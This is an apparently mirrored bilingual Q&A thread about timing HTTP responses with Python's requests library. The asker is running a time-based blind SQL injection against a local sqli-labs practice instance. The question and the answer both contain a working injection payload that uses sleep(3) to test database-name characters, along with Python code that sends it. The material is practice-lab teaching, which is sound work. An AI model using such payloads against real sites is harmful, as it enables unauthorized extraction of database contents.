使用Python中的请求库测量HTTP响应时间.我做对了吗? [英] Measuring the HTTP response time with requests library in Python. Am I doing it right?

问题描述

我试图在Web应用程序的HTTP响应中引入人为延迟(这是一种用于盲目SQL注入的技术).如果以下HTTP请求是从浏览器发送的，则Web服务器的响应会在3秒后返回(由sleep(3)引起):

I am trying to induce an artificial delay in the HTTP response from a web application (This is a technique used to do blind SQL Injections). If the below HTTP request is sent from a browser, response from the web server comes back after 3 seconds(caused by sleep(3)):

http://192.168.2.15/sqli-labs/Less-9/?id=1'+and+if+(ascii(substr(database(),+1,+1))=115,sleep(3),null)+--+

我正在尝试使用请求库在Python 2.7中执行相同的操作.我的代码是:

I am trying to do the same in Python 2.7 using the requests library. The code I have is:

import requests

payload = {"id": "1' and if (ascii(substr(database(), 1, 1))=115,sleep(3),null) --+"}
r = requests.get('http://192.168.2.15/sqli-labs/Less-9', params=payload)
roundtrip = r.elapsed.total_seconds()
print roundtrip

我希望往返时间为3秒，但我得到的值是0.001371、0.001616、0.002228等.我是否没有正确使用elapsed属性?

I expected the roundtrip to be 3 seconds, but instead I get values 0.001371, 0.001616, 0.002228, etc. Am I not using the elapsed attribute properly?

推荐答案

elapsed measures the time between sending the request and finishing parsing the response headers, not until the full response has been transfered.

如果要测量时间，则需要自己测量:

If you want to measure that time, you need to measure it yourself:

import requests
import time

payload = {"id": "1' and if (ascii(substr(database(), 1, 1))=115,sleep(3),null) --+"}
start = time.time()
r = requests.get('http://192.168.2.15/sqli-labs/Less-9', params=payload)
roundtrip = time.time() - start
print roundtrip

这篇关于使用Python中的请求库测量HTTP响应时间.我做对了吗?的文章就介绍到这了，希望我们推荐的答案对大家有所帮助，也希望大家多多支持IT屋！